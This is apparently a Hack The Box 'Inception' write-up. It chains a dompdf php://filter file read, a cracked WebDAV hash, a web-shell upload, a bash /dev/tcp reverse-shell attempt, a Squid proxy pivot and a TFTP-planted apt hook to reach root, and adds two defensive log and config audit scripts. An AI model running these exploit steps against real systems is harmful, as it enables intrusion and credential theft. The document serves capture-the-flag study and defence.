First, we enumerate the box with nmap.

```
$ nmap -A -p- 10.10.10.67
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 18:53 UTC
Scan NSE Timing: About 99.64% done; ETC: 18:55 (0:00:00 remaining)
Nmap scan report for 10.10.10.67
Host is up (0.0045s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 146.28 seconds
```

HTTP and a Squid proxy are open. Let's enumerate HTTP first. You can also find /dompdf by inspecting the web page.

```
$ gobuster dir -u http://10.10.10.67/ -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.html
/images      (Status: 301) [Size: 311] [--> http://10.10.10.67/images/]
/index.html  (Status: 200) [Size: 2877]
/assets      (Status: 301) [Size: 311] [--> http://10.10.10.67/assets/]
/README.txt  (Status: 200) [Size: 2307]
/LICENSE.txt (Status: 200) [Size: 17128]

$ gobuster dir -u http://10.10.10.67/ -w /opt/useful/SecLists/Discovery/Web-Content/big.txt -x .php,.txt,.html
/.htpasswd      (Status: 403) [Size: 295]
/.htaccess      (Status: 403) [Size: 295]
/.htaccess.php  (Status: 403) [Size: 299]
/.htpasswd.php  (Status: 403) [Size: 299]
/.htaccess.txt  (Status: 403) [Size: 299]
/.htpasswd.txt  (Status: 403) [Size: 299]
/.htpasswd.html (Status: 403) [Size: 300]
/.htaccess.html (Status: 403) [Size: 300]
/LICENSE.txt    (Status: 200) [Size: 17128]
/README.txt     (Status: 200) [Size: 2307]
/assets         (Status: 301) [Size: 311] [--> http://10.10.10.67/assets/]
/dompdf         (Status: 301) [Size: 311] [--> http://10.10.10.67/dompdf/]
/images         (Status: 301) [Size: 311] [--> http://10.10.10.67/images/]
/index.html     (Status: 200) [Size: 2877]
/server-status  (Status: 403) [Size: 299]
```

In the /dompdf directory we find something interesting: http://10.10.10.67/dompdf/VERSION tells us the version is 0.6.0, so this is dompdf 0.6.0. Let's search exploit-db.

```
$ searchsploit dompdf 0.6.0
------------------------------------------------------------ ---------------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ---------------------------
dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read        | php/webapps/33004.txt
dompdf 0.6.0 beta1 - Remote File Inclusion                  | php/webapps/14851.txt
------------------------------------------------------------ ---------------------------

$ searchsploit -m 33004
  Exploit: dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/33004
     Path: /usr/share/exploitdb/exploits/php/webapps/33004.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /home/htb-emilyz/33004.txt
```

Let's read the exploit. It says we can read arbitrary local files (LFI) by requesting a URL of this form:

http://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>

So for /etc/passwd:

http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd

We get back a PDF file. The file contents are embedded as base64 text, so we look at the strings in the PDF:

```
$ strings dompdf_out.pdf
BT 34.016 734.579 Td /F1 12.0 Tf [(cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluO TJ ET
```

Decode this base64 and you get /etc/passwd.
```
$ echo cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9 | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
cobb:x:1000:1000::/home/cobb:/bin/bash
```

Next, let's read the Apache default site configuration, 000-default.conf:

http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-available/000-default.conf

After base64-decoding it, you get this:

```
<VirtualHost *:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf

	Alias /webdav_test_inception /var/www/html/webdav_test_inception
	<Location /webdav_test_inception>
		Options FollowSymLinks
		DAV On
		AuthType Basic
		AuthName "webdav test credential"
		AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
		Require valid-user
	</Location>
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
```

The AuthUserFile for the WebDAV share is /var/www/html/webdav_test_inception/webdav.passwd, inside the document root. Let's read it the same way:

http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd

After decoding it, you get this credential:

```
$ echo 'd2ViZGF2X3Rlc3RlcjokYXByMSQ4ck83U21pNCR5cW43SC5HdkpGdHNUb3UxYTdWTUUwCg==' | base64 -d
webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
```

Let's crack it with hashcat.
```
$ hashcat -m 1600 hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0:babygurl69

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
Time.Started.....: Thu Dec  9 19:13:39 2021 (3 secs)
Time.Estimated...: Thu Dec  9 19:13:42 2021 (0 secs)
Guess.Base.......: File (/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     9071 H/s (8.48ms) @ Accel:256 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 22528/14344384 (0.16%)
Rejected.........: 0/22528 (0.00%)
Restore.Point....: 21504/14344384 (0.15%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: 212224236248 -> travon

Started: Thu Dec  9 19:12:38 2021
Stopped: Thu Dec  9 19:13:43 2021
```

The complete credential is webdav_tester:babygurl69. Let's upload a web shell over WebDAV with it:

```
$ cadaver http://10.10.10.67/webdav_test_inception
Authentication required for webdav test credential on server `10.10.10.67':
Username: webdav_tester
Password:
dav:/webdav_test_inception/> put /home/htb-emilyz/Desktop/hackthebox/webshell.php
Uploading /home/htb-emilyz/Desktop/hackthebox/webshell.php to `/webdav_test_inception/webshell.php':
Progress: [=============================>] 100.0% of 300 bytes succeeded.
```

Let's try to get a reverse shell:

```
bash -c 'bash -i >& /dev/tcp/10.10.14.22/9002 0>&1'
```

We can't get a connection back because of the Squid proxy. Let's look around the system using the web shell instead.
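From the defender's side, every one of the dompdf file reads above leaves a tell-tale line in Apache's access.log: a query parameter whose value starts with a PHP stream wrapper. The following is an added example, not code from the original writeup, that scans combined-format log lines for wrapper reads (php://, file://, data://, ...) and ../ traversal, peeling one extra layer of URL encoding, and reports the file each request actually targeted. The log lines are constructed to mirror the requests used in this writeup.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log line: client - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP stream wrappers a server-side PDF renderer should never accept from a remote client.
WRAPPER_RE = re.compile(r"^(php|file|data|expect|phar|zip|glob|ftp)://", re.I)

def inspect_request(target):
    """Classify one request target: ("wrapper", param, resource) for a stream-wrapper
    read, ("traversal", param, value) for a ../ attempt, or None when benign."""
    for param, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; peel a second encoding layer
            if WRAPPER_RE.match(decoded):
                # php://filter/<filters>/resource=<path> names the file actually read
                return ("wrapper", param, decoded.rsplit("resource=", 1)[-1])
            if "../" in decoded or "..\\" in decoded:
                return ("traversal", param, decoded)
    return None

def scan_log(lines):
    """Return one finding dict per suspicious request in the given log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        hit = inspect_request(m["target"])
        if hit:
            kind, param, resource = hit
            findings.append({"ip": m["ip"], "path": urlsplit(m["target"]).path,
                             "status": int(m["status"]), "kind": kind,
                             "param": param, "resource": resource})
    return findings

# Constructed sample log lines mirroring the request shapes used in this writeup.
SAMPLE_LOG = [
    '10.10.14.22 - - [09/Dec/2021:19:01:12 +0000] "GET /dompdf/dompdf.php?input_file='
    'php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 3521 "-" "Mozilla/5.0"',
    '10.10.14.22 - - [09/Dec/2021:19:05:40 +0000] "GET /dompdf/dompdf.php?input_file=php%3A%2F%2F'
    'filter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fvar%2Fwww%2Fhtml%2Fwebdav_test_inception'
    '%2Fwebdav.passwd HTTP/1.1" 200 3600 "-" "curl/7.74.0"',
    '203.0.113.5 - - [09/Dec/2021:19:06:01 +0000] "GET /index.html HTTP/1.1" 200 2877 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Dec/2021:19:07:15 +0000] "GET /dompdf/dompdf.php?input_file=invoice.html'
    ' HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]
```

A 200 status on a wrapper read is the signal that the file was served; the same check also catches reads of webdav.passwd, which is why the password file should never live under DocumentRoot in the first place.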
The WordPress config sits at ../wordpress_4.8.3/wp-config.php relative to the web shell:

```
cat ../wordpress_4.8.3/wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
```

We get a credential, but I can't connect over SSH: SSH is only reachable internally on this server.

```
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::3128                 :::*                    LISTEN      -
tcp6       0      0 192.168.0.10:80         192.168.0.1:44398       ESTABLISHED -
```

So we go through the Squid proxy with proxychains. The configuration file is /etc/proxychains.conf:

```
$ cat /etc/proxychains.conf | tail
#
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
http 10.10.10.67 3128
```

Let's connect to SSH through proxychains. Note that a stock squid.conf denies CONNECT to anything but SSL_ports (443), so this pivot to 127.0.0.1:22 only works because the proxy's ACLs have been relaxed.

```
$ proxychains ssh cobb@127.0.0.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.10.10.67:3128-<><>-127.0.0.1:22-<><>-OK
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
cobb@127.0.0.1's password: VwPddNh7xMZyDQoByQL4
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1
cobb@Inception:~$
```

Check privileges and then switch to root:

```
cobb@Inception:~$ sudo -l
[sudo] password for cobb:
Matching Defaults entries for cobb on Inception:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cobb may run the following commands on Inception:
    (ALL : ALL) ALL
cobb@Inception:~$ sudo -i
root@Inception:~# cat /root/root.txt
You're waiting for a train. A train that will take you far away. Wake up to find root.txt.
```

We can't find the real root.txt here. With ifconfig we can find the IP address of this machine:

```
root@Inception:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:28:53:63
          inet addr:192.168.0.10  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe28:5363/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:322521 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308666 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:50401957 (50.4 MB)  TX bytes:153554522 (153.5 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:512 errors:0 dropped:0 overruns:0 frame:0
          TX packets:512 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:52195 (52.1 KB)  TX bytes:52195 (52.1 KB)
```

We can find the gateway address with arp -a, then scan it with netcat:

```
root@Inception:~# arp -a
? (192.168.0.1) at fe:28:c4:25:5c:1b [ether] on eth0
root@Inception:~# nc -zvn 192.168.0.1 1-1000 2>&1 | grep -v "Connection refused"
Connection to 192.168.0.1 21 port [tcp/*] succeeded!
Connection to 192.168.0.1 22 port [tcp/*] succeeded!
Connection to 192.168.0.1 53 port [tcp/*] succeeded!
```

Let's connect to FTP. Anonymous login is allowed and the listing is the gateway's root filesystem:

```
root@Inception:~# ftp 192.168.0.1
Connected to 192.168.0.1.
220 (vsFTPd 3.0.3)
Name (192.168.0.1:cobb): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Nov 30  2017 bin
drwxr-xr-x    3 0        0            4096 Nov 30  2017 boot
drwxr-xr-x   19 0        0            3920 Dec 09 18:53 dev
drwxr-xr-x   93 0        0            4096 Nov 30  2017 etc
drwxr-xr-x    2 0        0            4096 Nov 06  2017 home
lrwxrwxrwx    1 0        0              33 Nov 30  2017 initrd.img -> boot/initrd.img-4.4.0-101-generic
lrwxrwxrwx    1 0        0              32 Nov 06  2017 initrd.img.old -> boot/initrd.img-4.4.0-98-generic
drwxr-xr-x   22 0        0            4096 Nov 30  2017 lib
drwxr-xr-x    2 0        0            4096 Oct 30  2017 lib64
drwx------    2 0        0           16384 Oct 30  2017 lost+found
drwxr-xr-x    3 0        0            4096 Oct 30  2017 media
drwxr-xr-x    2 0        0            4096 Aug 01  2017 mnt
drwxr-xr-x    2 0        0            4096 Aug 01  2017 opt
dr-xr-xr-x  200 0        0               0 Dec 09 18:53 proc
drwx------    6 0        0            4096 Nov 08  2017 root
drwxr-xr-x   26 0        0             920 Dec 09 18:53 run
drwxr-xr-x    2 0        0           12288 Nov 30  2017 sbin
drwxr-xr-x    2 0        0            4096 Apr 29  2017 snap
drwxr-xr-x    3 0        0            4096 Nov 06  2017 srv
dr-xr-xr-x   13 0        0               0 Dec 09 18:53 sys
drwxrwxrwt   10 0        0            4096 Dec 09 19:48 tmp
drwxr-xr-x   10 0        0            4096 Oct 30  2017 usr
drwxr-xr-x   13 0        0            4096 Oct 30  2017 var
lrwxrwxrwx    1 0        0              30 Nov 30  2017 vmlinuz -> boot/vmlinuz-4.4.0-101-generic
lrwxrwxrwx    1 0        0              29 Nov 06  2017 vmlinuz.old -> boot/vmlinuz-4.4.0-98-generic
226 Directory send OK.
```

We download files such as /etc/passwd, /etc/crontab and /etc/default/tftpd-hpa. The crontab shows that root runs apt update every five minutes:

```
root@Inception:~# cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *   * * *   root    apt update 2>&1 >/var/log/apt/custom.log
30 23   * * *   root    apt upgrade -y 2>&1 >/dev/null
```

The TFTP server runs as root, serves the whole filesystem and allows creating new files:

```
root@Inception:~# cat tftpd-hpa
# /etc/default/tftpd-hpa

TFTP_USERNAME="root"
TFTP_DIRECTORY="/"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="--secure --create"
```

Let's generate an SSH key pair:

```
root@Inception:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:rp/i/FAlGrmsgPjEb9T5Xul6ym/pBTmfu7A07FR0aSU root@Inception
The key's randomart image is:
(RSA 2048 randomart omitted)
```

Put the public key into the gateway's /root/.ssh/authorized_keys using TFTP:

```
root@Inception:~# tftp 192.168.0.1
tftp> put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
```

The file uploaded over TFTP is not created with restrictive permissions, and sshd refuses an authorized_keys that other users can write, so we need root on the gateway to chmod it for us. We were not sure how to change the permission through the apt update command; this link helped us write an apt hook that fixes the authorized_keys permission: https://www.cyberciti.biz/faq/debian-ubuntu-linux-hook-a-script-command-to-apt-get-upgradecommand/

```
root@Inception:~# echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshell
root@Inception:~# tftp 192.168.0.1
tftp> put rootshell /etc/apt/apt.conf.d/rootshell
```

Once the five-minute cron job has run apt update, log in to the gateway with the SSH key.
```
root@Inception:~# ssh -i id_rsa root@192.168.0.1
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Thu Dec  9 20:01:28 2021 from 192.168.0.10
root@Inception:~#
```
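The gateway fell to a combination of three configuration facts that can all be audited from the two files downloaded over FTP above: tftpd-hpa running as root over / with --create, and a root cron job that runs apt update, which executes any hook dropped into /etc/apt/apt.conf.d. The following is an added audit script, not code from the original writeup, that parses a tftpd-hpa defaults file and a set of apt.conf.d fragments and reports exactly those conditions. The sample inputs are constructed from the values shown on this page; the hook parser handles the flat `Key {"cmd";};` and `Key "cmd";` forms only, not nested `APT { ... }` blocks.

```python
import re
import shlex

# apt.conf keys whose string values apt runs through /bin/sh as root; the writeup's
# privilege escalation dropped an APT::Update::Pre-Invoke hook into /etc/apt/apt.conf.d.
HOOK_KEYS = frozenset({"APT::Update::Pre-Invoke", "APT::Update::Post-Invoke",
                       "APT::Update::Post-Invoke-Success", "DPkg::Pre-Invoke",
                       "DPkg::Post-Invoke", "DPkg::Pre-Install-Pkgs"})
# Matches 'Key {"cmd";};' and 'Key "cmd";' (flat forms; nested APT { ... } blocks are not parsed).
HOOK_RE = re.compile(r'(?P<key>[A-Za-z0-9_:-]+)\s*\{?\s*"(?P<cmd>[^"]*)"')

def audit_tftpd_defaults(text):
    """Parse /etc/default/tftpd-hpa (KEY="value" lines) and list the dangerous settings."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip()] = shlex.split(value)[0] if value.strip() else ""
    opts = cfg.get("TFTP_OPTIONS", "").split()
    findings = []
    if cfg.get("TFTP_USERNAME") == "root":
        findings.append("runs as root, so filesystem permissions never limit transfers")
    if cfg.get("TFTP_DIRECTORY") == "/":
        findings.append("serves the whole filesystem (/etc, /root and /etc/apt/apt.conf.d are reachable)")
    if "--create" in opts:
        findings.append("--create lets unauthenticated clients create new files, not only overwrite existing ones")
    if "--secure" not in opts:
        findings.append("--secure is missing, so the daemon is not chrooted to TFTP_DIRECTORY")
    return findings

def audit_apt_hooks(files):
    """files maps /etc/apt/apt.conf.d/* paths to their contents. Returns (path, key, command)
    for every hook command that the next root-run 'apt update' / 'apt upgrade' will execute."""
    hits = []
    for path, text in files.items():
        for m in HOOK_RE.finditer(text):
            if m["key"] in HOOK_KEYS:
                hits.append((path, m["key"], m["cmd"]))
    return hits

# Constructed inputs: the tftpd-hpa defaults from the writeup and two apt.conf.d fragments.
TFTPD_DEFAULTS = '# /etc/default/tftpd-hpa\n\nTFTP_USERNAME="root"\nTFTP_DIRECTORY="/"\n' \
                 'TFTP_ADDRESS=":69"\nTFTP_OPTIONS="--secure --create"\n'
APT_CONF_D = {
    "/etc/apt/apt.conf.d/20auto-upgrades": 'APT::Periodic::Update-Package-Lists "1";\n',
    "/etc/apt/apt.conf.d/rootshell": 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};\n',
}
```

Note that --secure is present on this box but chroots to /, which restricts nothing; the first three findings are what made the unauthenticated write into /etc/apt/apt.conf.d possible.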